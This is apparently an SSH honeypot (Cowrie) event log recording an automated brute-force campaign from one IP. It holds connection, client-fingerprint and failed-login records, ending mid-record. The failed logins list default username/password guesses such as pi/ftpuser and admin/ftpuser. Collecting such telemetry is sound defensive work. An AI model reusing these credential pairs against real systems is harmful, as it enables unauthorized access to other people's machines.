{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:42.078595Z","src_ip":"212.227.125.160","session":"59cab2b7a601"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:42.091285Z","src_ip":"212.227.125.160","session":"f40f57a5718f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55102,"dst_ip":"1.2.3.4","dst_port":22,"session":"987020635ca0","protocol":"ssh","message":"New connection: 212.227.125.160:55102 (1.2.3.4:22) [session: 987020635ca0]","sensor":"my-vps","timestamp":"2025-08-31T07:06:42.128990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:42.138140Z","src_ip":"212.227.125.160","session":"4375e6e3b841"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:42.139216Z","src_ip":"212.227.125.160","session":"4375e6e3b841"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:42.370625Z","src_ip":"212.227.125.160","session":"e7355599d5c5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:42.380025Z","src_ip":"212.227.125.160","session":"987020635ca0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:42.381424Z","src_ip":"212.227.125.160","session":"987020635ca0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55112,"dst_ip":"1.2.3.4","dst_port":22,"session":"66f308861402","protocol":"ssh","message":"New connection: 212.227.125.160:55112 (1.2.3.4:22) [session: 66f308861402]","sensor":"my-vps","timestamp":"2025-08-31T07:06:42.444514Z"}
{"eventid":"cowrie.login.failed","username":"student","password":"ftpuser","message":"login attempt [student/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:42.617922Z","src_ip":"212.227.125.160","session":"83aca2628d28"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:42.896019Z","src_ip":"212.227.125.160","session":"66f308861402"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:42.896677Z","src_ip":"212.227.125.160","session":"66f308861402"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:43.246053Z","src_ip":"212.227.125.160","session":"9562c6ea58ff"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:43.299034Z","src_ip":"212.227.125.160","session":"4375e6e3b841"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55114,"dst_ip":"1.2.3.4","dst_port":22,"session":"c347a78f82c2","protocol":"ssh","message":"New connection: 212.227.125.160:55114 (1.2.3.4:22) [session: c347a78f82c2]","sensor":"my-vps","timestamp":"2025-08-31T07:06:43.303134Z"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:43.352508Z","src_ip":"212.227.125.160","session":"f40f57a5718f"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ftpuser","message":"login attempt [ubnt/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:43.392844Z","src_ip":"212.227.125.160","session":"59cab2b7a601"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:43.420116Z","src_ip":"212.227.125.160","session":"c347a78f82c2"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:43.420939Z","src_ip":"212.227.125.160","session":"c347a78f82c2"}
{"eventid":"cowrie.login.failed","username":"noc","password":"ftpuser","message":"login attempt [noc/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:43.576925Z","src_ip":"212.227.125.160","session":"987020635ca0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ftpuser","message":"login attempt [admin/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:43.578444Z","src_ip":"212.227.125.160","session":"66f308861402"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:43.752508Z","src_ip":"212.227.125.160","session":"83aca2628d28"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55130,"dst_ip":"1.2.3.4","dst_port":22,"session":"26b5726a402b","protocol":"ssh","message":"New connection: 212.227.125.160:55130 (1.2.3.4:22) [session: 26b5726a402b]","sensor":"my-vps","timestamp":"2025-08-31T07:06:43.817930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:43.890504Z","src_ip":"212.227.125.160","session":"26b5726a402b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:43.891120Z","src_ip":"212.227.125.160","session":"26b5726a402b"}
{"eventid":"cowrie.login.failed","username":"pi","password":"ftpuser","message":"login attempt [pi/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:43.968443Z","src_ip":"212.227.125.160","session":"c347a78f82c2"}
{"eventid":"cowrie.login.failed","username":"student","password":"student","message":"login attempt [student/student] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.204094Z","src_ip":"212.227.125.160","session":"26b5726a402b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.341730Z","src_ip":"212.227.125.160","session":"4375e6e3b841"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55142,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d59f2996e12","protocol":"ssh","message":"New connection: 212.227.125.160:55142 (1.2.3.4:22) [session: 6d59f2996e12]","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.384053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.384749Z","src_ip":"212.227.125.160","session":"6d59f2996e12"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.395995Z","src_ip":"212.227.125.160","session":"f40f57a5718f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.427526Z","src_ip":"212.227.125.160","session":"6d59f2996e12"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.435923Z","src_ip":"212.227.125.160","session":"59cab2b7a601"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55148,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b9ee4ed073a","protocol":"ssh","message":"New connection: 212.227.125.160:55148 (1.2.3.4:22) [session: 3b9ee4ed073a]","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.437230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.437977Z","src_ip":"212.227.125.160","session":"3b9ee4ed073a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55160,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e7566e432d1","protocol":"ssh","message":"New connection: 212.227.125.160:55160 (1.2.3.4:22) [session: 4e7566e432d1]","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.477502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.478448Z","src_ip":"212.227.125.160","session":"4e7566e432d1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.480228Z","src_ip":"212.227.125.160","session":"3b9ee4ed073a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.520677Z","src_ip":"212.227.125.160","session":"4e7566e432d1"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"student","message":"login attempt [ftpuser/student] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.569255Z","src_ip":"212.227.125.160","session":"6d59f2996e12"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.620653Z","src_ip":"212.227.125.160","session":"987020635ca0"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.621588Z","src_ip":"212.227.125.160","session":"66f308861402"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"student","message":"login attempt [ubnt/student] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.647884Z","src_ip":"212.227.125.160","session":"4e7566e432d1"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"student","message":"login attempt [ftpuser/student] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.650552Z","src_ip":"212.227.125.160","session":"3b9ee4ed073a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55170,"dst_ip":"1.2.3.4","dst_port":22,"session":"670814afb3a5","protocol":"ssh","message":"New connection: 212.227.125.160:55170 (1.2.3.4:22) [session: 670814afb3a5]","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.662415Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55180,"dst_ip":"1.2.3.4","dst_port":22,"session":"481581685f08","protocol":"ssh","message":"New connection: 212.227.125.160:55180 (1.2.3.4:22) [session: 481581685f08]","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.663271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.663908Z","src_ip":"212.227.125.160","session":"670814afb3a5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.664538Z","src_ip":"212.227.125.160","session":"481581685f08"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-